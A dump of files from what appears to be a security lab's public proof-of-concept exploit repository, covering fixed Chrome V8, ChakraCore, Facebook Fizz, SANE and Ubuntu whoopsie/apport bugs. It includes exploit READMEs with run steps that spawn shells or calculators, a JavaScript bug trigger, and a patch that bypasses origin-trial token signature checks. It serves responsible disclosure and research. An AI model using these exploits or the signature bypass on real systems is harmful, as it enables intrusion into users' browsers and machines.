 * @param {number} miliseconds how long to spin (original spelling kept)
 * @returns {undefined}
 */
function sleep(miliseconds) {
  const deadline = new Date().getTime() + miliseconds;
  while (new Date().getTime() <= deadline) {
    // spin
  }
}
7 |
class TestProcessor extends AudioWorkletProcessor {
  /**
   * Render callback: busy-waits for 300 ms (see sleep()) on every invocation
   * and then reports that the processor should be kept alive.
   *
   * @returns {boolean} always true
   */
  process(inputs, outputs, parameters) {
    const keepAlive = true;
    sleep(300);
    return keepAlive;
  }
}
14 |
// Publish the processor under the name 'test-processor' (presumably the
// name the page-side AudioWorkletNode is created with).
registerProcessor('test-processor', TestProcessor);
16 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE-2021-37975/chrome_poc_parent.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2022_1134/README.md:
--------------------------------------------------------------------------------
1 | # Chrome renderer RCE CVE-2022-1134
2 |
3 | The write-up can be found [here](https://github.blog/2022-06-29-the-chromium-super-inline-cache-type-confusion/). This is a bug in v8 that I reported in March 2022. This bug allows RCE in the Chrome renderer sandbox by simply visiting a malicious website.
4 |
5 | The exploit is tested with the Linux official build of Chrome version `99.0.4844.84` with the following revision (this can be checked from `chrome://version`):
6 |
7 | ```
8 | Chromium 99.0.4844.84 (Official Build) (64-bit)
9 | Revision 81a11fc2ee8a41e17451f29195387f276d3bb379-refs/branch-heads/4844_74@{#6}
10 | ```
11 |
12 | For reference, the tested binary is compiled with the following flags, following the instructions to compile Chrome [here](https://chromium.googlesource.com/chromium/src/+/main/docs/linux/build_instructions.md):
13 |
14 | ```
15 | is_debug = false
16 | symbol_level = 2
17 | blink_symbol_level = 2
18 | dcheck_always_on = false
19 | is_official_build = true
20 | chrome_pgo_phase = 0
21 | ```
22 |
23 | To test, host the file `superic_rce.html` and then open it in Chrome with the `--no-sandbox` flag:
24 |
25 | ```
26 | ./chrome --user-data-dir=/tmp/chromium_data --no-sandbox
27 | ```
28 |
29 | If successful, it'll pop `xcalc` instantly (on Ubuntu). The exploit should be very reliable; I have not experienced any failure with it.
30 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2023_4069/README.md:
--------------------------------------------------------------------------------
1 | ## V8 type confusion CVE-2023-4069
2 |
3 | The analysis of this bug can be found [here](https://github.blog/2023-10-17-getting-rce-in-chrome-with-incomplete-object-initialization-in-the-maglev-compiler).
4 |
5 | The exploit here is tested on `v8` version 11.5.150.16, which is the version shipped with Chrome 115.0.5790.98/99, the one before the bug was fixed, on Ubuntu 22.04. I have not tested it on Chrome itself.
6 |
7 | To test, check out `v8` at version 11.5.150.16 and compile with the default settings using `tools/dev/gm.py x64.release`. Then open the file `poc.js` with `d8` with the `maglev` flag (Chrome would have enabled this flag already):
8 |
9 | ```
10 | ./d8 --maglev poc.js
11 | ```
12 |
13 | On Ubuntu 22.04, it should call `execve("/bin/sh")` to spawn a new process:
14 |
15 | ```
16 | ./d8 --maglev exploit.js
17 | oobDblAddr: 421e9
18 | oobDblArr new length: 256
19 | oobDblAddr2: 42251
20 | oobObjAddr: 42299
21 | func Addr: 19bf6d
22 | code Addr: 19eb79
23 | maglev Addr: e000d900 55d6
24 | $
25 | ```
26 |
27 | Shell code and some addresses may need changing on other platforms.
28 |
29 |
30 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2024_3833/README.md:
--------------------------------------------------------------------------------
1 | ## V8 type confusion CVE-2024-3833
2 |
3 | The analysis of this bug can be found [here](https://github.blog/2024-06-26-attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties).
4 |
5 | The exploit here is tested on the official build of Chrome version 123.0.6312.58, on Ubuntu 22.04. The following build config was used to build Chromium:
6 |
7 | ```
8 | is_debug = false
9 | symbol_level = 1
10 | blink_symbol_level = 1
11 | dcheck_always_on = false
12 | is_official_build = true
13 | chrome_pgo_phase = 0
14 | v8_symbol_level = 1
15 | ```
16 |
17 | The bug depends on an origin trial and to emulate it locally, the patch `trial-token.patch` should be applied before building Chrome.
18 |
19 | If successful, on Ubuntu 22.04, it should launch `xcalc` when `wasm_poc.html` is opened in Chrome.
20 |
21 | Shell code and some addresses may need changing on other platforms.
22 |
23 |
24 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2024_3833/trial-token.patch:
--------------------------------------------------------------------------------
1 | diff --git a/third_party/blink/common/origin_trials/trial_token.cc b/third_party/blink/common/origin_trials/trial_token.cc
2 | index e3a28923fce19..70c24dd445066 100644
3 | --- a/third_party/blink/common/origin_trials/trial_token.cc
4 | +++ b/third_party/blink/common/origin_trials/trial_token.cc
5 | @@ -116,6 +116,17 @@ OriginTrialTokenStatus TrialToken::Extract(
6 | std::string* out_token_payload,
7 | std::string* out_token_signature,
8 | uint8_t* out_token_version) {
9 | +
10 | + if (token_text.length() > kMaxTokenSize || public_key.size() == 0 || token_text.length() < kPayloadOffset) {
11 | + return OriginTrialTokenStatus::kMalformed;
12 | + }
13 | +
14 | + *out_token_payload = token_text;
15 | + *out_token_signature = "1234";
16 | + *out_token_version = kVersion2;
17 | + return OriginTrialTokenStatus::kSuccess;;
18 | +
19 | +/*
20 | if (token_text.empty()) {
21 | return OriginTrialTokenStatus::kMalformed;
22 | }
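Review bot: `return OriginTrialTokenStatus::kSuccess;;` carries a stray second semicolon — an empty statement that compiles but reads as a typo; make it `return OriginTrialTokenStatus::kSuccess;`. The `/*` opened at the end of this hunk is only closed by the `*/` in the second hunk, and because C++ block comments do not nest, any `*/` already present in the skipped body (a trailing comment, say) would end the comment early and re-enable the code below it; `#if 0` / `#endif` around the same range disables it without that hazard. The added guard line also runs well past 80 columns and would read better with one condition per line. Extract's parameter list begins before the hunk and its body continues after it.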
23 | @@ -178,6 +189,7 @@ OriginTrialTokenStatus TrialToken::Extract(
24 | *out_token_payload = token_contents.substr(kPayloadOffset, payload_length);
25 | *out_token_signature = std::string(signature);
26 | return OriginTrialTokenStatus::kSuccess;
27 | + */
28 | }
29 |
30 | // static
31 | --
32 |
--------------------------------------------------------------------------------
/SecurityExploits/Chrome/v8/CVE_2024_5830/README.md:
--------------------------------------------------------------------------------
1 | ## V8 type confusion CVE-2024-5830
2 |
3 | The analysis of this bug can be found [here](https://github.blog/2024-08-13-from-object-transition-to-rce-in-the-chrome-renderer).
4 |
5 | The exploit here is tested on the official build of Chrome version 125.0.6422.112, on Ubuntu 22.04. The following build config was used to build Chromium:
6 |
7 | ```
8 | is_debug = false
9 | symbol_level = 1
10 | blink_symbol_level = 1
11 | dcheck_always_on = false
12 | is_official_build = true
13 | chrome_pgo_phase = 0
14 | v8_symbol_level = 1
15 | ```
16 |
17 | If successful, on Ubuntu 22.04, it should launch `xcalc` when `calc.html` is opened in Chrome.
18 |
19 | Shell code and some addresses may need changing on other platforms.
20 |
21 |
22 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/attacker/home/poc/Makefile:
--------------------------------------------------------------------------------
# Build the PoC client from its single source file.
CC = gcc

poc: poc.c
	$(CC) -o $@ $<
3 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/ca.config:
--------------------------------------------------------------------------------
1 | [ req ]
2 | default_bits = 2048
3 | distinguished_name = dn
4 | x509_extensions = san
5 | req_extensions = san
6 | extensions = san
7 | prompt = no
8 |
9 | [ ca ]
10 | default_ca = ca_default
11 |
12 | [ ca_default ]
13 | private_key = root-ca-key.pem
14 | certificate = root-ca.pem
15 | new_certs_dir = new_certs
16 | database = root-ca.index
17 | default_md = sha256
18 | serial = root-ca.serial
19 | email_in_dn = no
20 | default_days = 365
21 | policy = policy
22 |
23 | [ policy ]
24 | countryName = optional
25 | stateOrProvinceName = optional
26 | localityName = optional
27 | organizationName = optional
28 | organizationalUnitName = optional
29 | commonName = supplied
30 |
31 | [ dn ]
32 | countryName = US
33 | stateOrProvinceName = CA
34 | localityName = San Francisco
35 | organizationName = Wholesome Certifications Inc.
36 | commonName = wholesomecertifications.com
37 | emailAddress = support@wholesomecertifications.com
38 |
39 | [ san ]
40 | basicConstraints = CA:TRUE
41 | subjectAltName = @alt_names
42 | subjectKeyIdentifier = hash
43 |
44 | [ alt_names ]
45 | DNS.1 = *.wholesomecertifications.com
46 | DNS.2 = *.wholesomecerts.com
47 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/clean.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Delete all auto-generated files: editor backups, the root-CA material,
# the issued server/client PEMs, and the CA database directory created by
# create-certs.sh. Missing files are not an error (-f), so this is safe to
# run on a fresh checkout.

for pattern in '*~' 'root-ca*' 'server-*.pem' 'client-*.pem'; do
  rm -f $pattern
done
rm -rf new_certs
10 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/create-certs.sh:
--------------------------------------------------------------------------------
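#!/bin/bash

# Generate a throwaway root CA and a server certificate signed by it, driven
# by ca.config and server.config. Run it from this directory: both config
# files refer to the generated files by relative path (root-ca-key.pem,
# root-ca.index, new_certs/, ...). clean.sh removes everything created here.
#
# All private keys are written unencrypted (-nodes); this is demo material.

# Stop at the first failing command so an openssl error does not leave a
# half-initialised CA database behind for the next step to trip over.
set -eu

# CA database files expected by `openssl ca`. mkdir -p lets the script be
# re-run after a partial run instead of failing on the existing directory.
mkdir -p new_certs
touch root-ca.index
touch root-ca.index.attr
echo 00 > root-ca.crlnum
# Random 128-bit starting serial so issued serial numbers are unpredictable.
openssl rand -hex 16 > root-ca.serial

# Create the self-signed root certificate and its key.
openssl req -config ca.config -new -x509 -sha256 -newkey rsa:2048 -nodes \
  -keyout root-ca-key.pem -days 365 -out root-ca.pem

# Create the signing request (and key) for the server.
openssl req -config server.config -new -sha256 -newkey rsa:2048 -nodes \
  -keyout server-key.pem -days 365 -out server-request.pem

# Issue the server certificate from the root CA, applying [ server_ext ]
# from server.config (CA:FALSE, SAN *.wholesomecomputing.com).
openssl ca -config server.config -batch -days 365 -extensions server_ext \
  -out server-cert.pem -infiles server-request.pem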
19 |
--------------------------------------------------------------------------------
/SecurityExploits/Facebook/Fizz/CVE-2019-3560/server/home/certs/server.config:
--------------------------------------------------------------------------------
1 | [ req ]
2 | default_bits = 2048
3 | distinguished_name = dn
4 | x509_extensions = server_ext
5 | req_extensions = server_ext
6 | extensions = server_ext
7 | prompt = no
8 |
9 | [ ca ]
10 | default_ca = ca_default
11 |
12 | [ ca_default ]
13 | private_key = root-ca-key.pem
14 | certificate = root-ca.pem
15 | new_certs_dir = new_certs
16 | database = root-ca.index
17 | default_md = sha256
18 | serial = root-ca.serial
19 | email_in_dn = no
20 | default_days = 365
21 | policy = policy
22 |
23 | [ policy ]
24 | countryName = optional
25 | stateOrProvinceName = optional
26 | localityName = optional
27 | organizationName = optional
28 | organizationalUnitName = optional
29 | commonName = supplied
30 |
31 | [ dn ]
32 | countryName = US
33 | stateOrProvinceName = CA
34 | localityName = San Francisco
35 | organizationName = Wholesome Computing Inc.
36 | commonName = server.wholesomecomputing.com
37 | emailAddress = support@wholesomecomputing.com
38 |
39 | [ server_ext ]
40 | basicConstraints = CA:FALSE
41 | subjectAltName = @alt_names
42 | subjectKeyIdentifier = hash
43 |
44 | [ alt_names ]
45 | DNS.1 = *.wholesomecomputing.com
46 |
--------------------------------------------------------------------------------
/SecurityExploits/Microsoft/ChakraCore/CVE-2017-0141/cve-2017-0141.js:
--------------------------------------------------------------------------------
// An array with a single element at index 0 whose length is then stretched
// to 1000, so indices 1..999 are holes that fall through to the prototype
// chain on lookup.
var a = [1];
a.length = 1000;

// A plain object carrying an accessor for index 1. When the getter runs it
// appends one million elements to `a` (indices 0x100000..0x1fffff) before
// yielding the value 2.
var o = {};
Object.defineProperty(o, '1', {
  get() {
    var i = 0;
    while (i < 0x100000) {
      a[0x100000 + i] = i;
      i++;
    }
    return 2;
  }
});

// Make `o` the prototype of `a`, so the hole at index 1 resolves to the
// getter above.
Object.setPrototypeOf(a, o);

// Run the generic Array.prototype.reverse over `a`; reading index 1 during
// the reversal fires the getter, which resizes `a` while reverse is iterating.
var r = Array.prototype.reverse.call(a);
17 |
--------------------------------------------------------------------------------
/SecurityExploits/README.md:
--------------------------------------------------------------------------------
1 | # SecurityExploits
2 | This directory contains proof-of-concept exploits developed by [GitHub Security Lab](https://securitylab.github.com) and other contributors. We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.
3 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/.gitignore:
--------------------------------------------------------------------------------
1 | fakescanner
2 | sane_backends_exploit
3 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/Makefile:
--------------------------------------------------------------------------------
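# Builds the two PoC binaries; both share utils.cpp/utils.hpp.
CXX = g++
CXXFLAGS = -Wall -Wextra -O2
PROGRAMS = fakescanner sane_backends_exploit

# Neither target names a real file, so a stray file called "all" or "clean"
# must not make them appear up to date.
.PHONY: all clean

all: $(PROGRAMS)

fakescanner: fakescanner.cpp utils.hpp utils.cpp
	$(CXX) $(CXXFLAGS) fakescanner.cpp utils.cpp -o $@

sane_backends_exploit: sane_backends_exploit.cpp utils.hpp utils.cpp
	$(CXX) $(CXXFLAGS) sane_backends_exploit.cpp utils.cpp -o $@

clean:
	rm -f $(PROGRAMS)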
11 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/README.md:
--------------------------------------------------------------------------------
1 | # Vulnerabilities in SANE Backends and HPLIP
2 |
3 | This directory contains two proof-of-concept exploits for several vulnerabilities in
4 | [SANE Backends](https://gitlab.com/sane-project/backends).
5 |
6 | The first PoC, [fakescanner.cpp](fakescanner.cpp),
7 | is an enumeration of the different vulnerabilities listed in the
8 | [bug report](https://gitlab.com/sane-project/backends/-/issues/279).
9 | Run it like this:
10 |
11 | ```bash
12 | make
13 | ./fakescanner epson 0
14 | ```
15 |
16 | (There are different command-line options for triggering different bugs.)
17 | On a different computer, start
18 | [Simple Scan](https://packages.ubuntu.com/bionic/simple-scan).
19 |
20 | The second PoC, [sane_backends_exploit.cpp](sane_backends_exploit.cpp),
21 | is a more elaborate exploit which uses a subset of the vulnerabilities
22 | to pop a calculator.
23 | It is designed to target
24 | [Simple Scan](https://packages.ubuntu.com/bionic/simple-scan)
25 | on
26 | [Ubuntu 18.04 LTS](https://releases.ubuntu.com/bionic/).
27 | It will not work on more recent Ubuntu versions due to the glibc version
28 | being different.
29 | Run it like this:
30 |
31 | ```bash
32 | make
33 | ./sane_backends_exploit
34 | ```
35 |
36 | On a different computer, start
37 | [Simple Scan](https://packages.ubuntu.com/bionic/simple-scan).
38 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/Dockerfile:
--------------------------------------------------------------------------------
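FROM ubuntu:bionic

# Toolchain for the demos (build-essential, gdb) plus a few conveniences
# (tmux, sudo, emacs). The apt package lists are removed in the same layer
# so they do not bloat the image.
RUN apt-get update && \
    apt-get install -y \
        build-essential gdb \
        tmux sudo emacs && \
    rm -rf /var/lib/apt/lists/*

# Pass --build-arg UID=`id -u` (see README.md) so the demo user's uid matches
# the host user's.
ARG UID=1000

# Create a non-root user account.
RUN adduser demo --disabled-password --uid $UID

# Grant the 'demo' user sudo access. This is not used for the demo,
# but it is often handy for installing extra packages.
# The password is the fixed, public value "x"; it only gates sudo inside
# this local, throwaway container.
RUN adduser demo sudo
RUN echo "demo:x" | chpasswd
COPY home/ /home/demo/
RUN chown -R demo:demo /home/demo

# Switch over to the 'demo' user, since root access is no longer required
USER demo
WORKDIR /home/demo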
23 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/README.md:
--------------------------------------------------------------------------------
1 | Build the docker image:
2 |
3 | ```
4 | docker build . -t glibc-heap-exploit-demos --build-arg UID=`id -u`
5 | ```
6 |
7 | Start the container:
8 |
9 | ```
10 | docker run --rm -i -t glibc-heap-exploit-demos
11 | ```
12 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home/.gitignore:
--------------------------------------------------------------------------------
1 | 01_chunk_layout
2 | 02_arithmetic_with_top
3 | 03_overlap_top_chunk
4 | 04_A_fastbin_reverse_into_tcache
5 | 04_B_fastbin_reverse_into_tcache
6 | 05_shrink_tcache_chunk
7 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home/.tmux.conf:
--------------------------------------------------------------------------------
1 | # Enable 256 colors
2 | set -g default-terminal "screen-256color"
3 |
4 | # Enable using the mouse to switch windows.
5 | set -g mouse on
6 |
7 | # Don't lose track of SSH_AGENT etc. from parent environment.
8 | set -g update-environment -r
9 |
10 | # history buffer size
11 | set-option -g history-limit 100000
12 |
--------------------------------------------------------------------------------
/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home/Makefile:
--------------------------------------------------------------------------------
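PROGRAMS = 01_chunk_layout 02_arithmetic_with_top 03_overlap_top_chunk 04_A_fastbin_reverse_into_tcache 04_B_fastbin_reverse_into_tcache 05_shrink_tcache_chunk
# -O0 -g keeps the heap layout and variables inspectable in gdb.
CFLAGS += -std=c99 -Wall -Wextra -O0 -g

# Neither target names a real file, so a stray file called "all" or "clean"
# must not make them appear up to date.
.PHONY: all clean

# Each program is built from the like-named .c file by make's built-in
# rule for a single-file executable, which picks up CFLAGS above.
all: $(PROGRAMS)

clean:
	rm -f $(PROGRAMS)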
7 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/.gitignore:
--------------------------------------------------------------------------------
1 | gencrashreport
2 | killwhoopsie1
3 | killwhoopsie2
4 | segv
5 | whoopsie_exploit
6 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/Makefile:
--------------------------------------------------------------------------------
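# Builds the Apport/whoopsie PoCs. The C++ programs share utils.cpp;
# whoopsie_exploit additionally pulls in encoding.c, which is compiled by
# g++ together with the C++ sources, as before.
CXX = g++
CC = gcc
CXXFLAGS = -Wall -O2
CFLAGS = -Wall -O2
PROGRAMS = gencrashreport killwhoopsie1 killwhoopsie2 segv whoopsie_exploit

# Neither target names a real file, so a stray file called "all" or "clean"
# must not make them appear up to date.
.PHONY: all clean

all: $(PROGRAMS)

gencrashreport: gencrashreport.cpp utils.cpp
	$(CXX) $(CXXFLAGS) gencrashreport.cpp utils.cpp -o $@

killwhoopsie1: killwhoopsie1.cpp utils.cpp
	$(CXX) $(CXXFLAGS) killwhoopsie1.cpp utils.cpp -o $@

killwhoopsie2: killwhoopsie2.cpp utils.cpp
	$(CXX) $(CXXFLAGS) killwhoopsie2.cpp utils.cpp -o $@

segv: segv.c
	$(CC) $(CFLAGS) segv.c -o $@

whoopsie_exploit: whoopsie_exploit.cpp restart_whoopsie.cpp load_crash_report.cpp encoding.c utils.cpp
	$(CXX) $(CXXFLAGS) whoopsie_exploit.cpp restart_whoopsie.cpp load_crash_report.cpp encoding.c utils.cpp -o $@

clean:
	rm -f $(PROGRAMS)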
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/README_CVE-2019-11476.md:
--------------------------------------------------------------------------------
1 | # Integer overflow in parse_report (whoopsie CVE-2019-11476)
2 |
3 | [CVE-2019-11476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11476)
4 | is a local denial of service vulnerability in
5 | [whoopsie](https://launchpad.net/ubuntu/+source/whoopsie).
6 | An integer overflow when reading large crash dumps (> 4GB) leads to a heap buffer overflow.
7 | I do not believe it is possible to exploit this heap buffer overflow to achieve code execution,
8 | so I have classified this bug as a denial of service.
9 | The full bug report is public on `bugs.launchpad.net`:
10 | [bug 1830863](https://bugs.launchpad.net/ubuntu/+source/whoopsie/+bug/1830863).
11 |
12 | ## Instructions
13 |
14 | Note: these reproduction steps will only work with a vulnerable version of whoopsie.
15 | See [CVE-2019-11476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11476)
16 | for a list of vulnerable versions.
17 |
18 | Build the PoC as follows:
19 |
20 | ```bash
21 | make
22 | ```
23 |
24 | And run it like this:
25 |
26 | ```bash
27 | ./killwhoopsie1
28 | ```
29 |
30 | The PoC works by creating a file named `/var/crash/killwhoopsie.crash`,
31 | just over 4GB in size. It then creates a file named
32 | `/var/crash/killwhoopsie.upload`, which prompts whoopsie to start
33 | processing the .crash file. Be aware that whoopsie will keep restarting
34 | and crash repeatedly until you remove the files from `/var/crash`:
35 |
36 | ```bash
37 | rm /var/crash/killwhoopsie.*
38 | ```
39 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/README_CVE-2019-11481.md:
--------------------------------------------------------------------------------
1 | # Symlink traversal in apport (CVE-2019-11481)
2 |
3 | [CVE-2019-11481](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11481)
4 | is a local denial of service vulnerability in
5 | [apport](https://launchpad.net/ubuntu/+source/apport).
6 | If `~/.config/apport/settings` is a symlink,
7 | then apport will read the target file,
8 | even if it requires root privileges to read.
9 | Apport usually errors out immediately after reading the file, though,
10 | so I do not believe it is possible to exploit this vulnerability in an interesting way.
11 | The full bug report is public on `bugs.launchpad.net`:
12 | [bug 1830862](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1830862).
13 |
14 | ## Instructions
15 |
16 | Please be aware that these instructions are likely to make your
17 | computer completely unresponsive for several minutes (the symlink below points apport at `/dev/zero`, an endless stream, so it presumably keeps reading until memory is exhausted), so run them in a disposable VM rather than on a machine you care about.
18 |
19 | ```bash
20 | make
21 | mkdir -p ~/.config/apport
22 | ln -s /dev/zero ~/.config/apport/settings
23 | ./segv
24 | ```
25 |
26 | After running the exploit, don't forget to remove the malicious symlink; as long as it is in place, every later crash that apport handles will hit the same problem:
27 |
28 | ```bash
29 | rm ~/.config/apport/settings
30 | ```
31 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/README_CVE-2019-11484.md:
--------------------------------------------------------------------------------
1 | # Integer overflow in bson_ensure_space (whoopsie CVE-2019-11484)
2 |
3 | [CVE-2019-11484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11484)
4 | is an integer overflow in [whoopsie](https://launchpad.net/ubuntu/+source/whoopsie).
5 | The integer overflow is triggered by a large crash report (> 2GB) and leads to
6 | a subsequent heap buffer overflow.
7 | This file contains instructions for running the simple version of the proof-of-concept exploit,
8 | which just causes whoopsie to crash with a segmentation fault.
9 | A more sophisticated PoC, which can get a shell as the whoopsie user, is described in
10 | [README_CVE-2019-15790](README_CVE-2019-15790.md).
11 | The full bug report is public on `bugs.launchpad.net`:
12 | [bug 1830865](https://bugs.launchpad.net/ubuntu/+source/whoopsie/+bug/1830865).
13 |
14 | ## Instructions
15 |
16 | Note: these reproduction steps will only work with a vulnerable version of whoopsie.
17 | See [CVE-2019-11484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11484)
18 | for a list of vulnerable versions.
19 |
20 | Build the PoC as follows:
21 |
22 | ```bash
23 | make
24 | ```
25 |
26 | And run it like this:
27 |
28 | ```bash
29 | ./killwhoopsie2
30 | ```
31 |
32 | As with the CVE-2019-11476 PoC, whoopsie may keep restarting and crashing on the crash report this PoC leaves behind. If that happens, look in `/var/crash` for the files `killwhoopsie2` created and remove them.
33 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/encoding.h:
--------------------------------------------------------------------------------
1 | bool make_string_valid(char* str);
2 |
--------------------------------------------------------------------------------
/SecurityExploits/Ubuntu/Apport_TOCTOU_get_ignore_dom_CVE-2019-7307/load_crash_report.hpp:
--------------------------------------------------------------------------------
1 | #include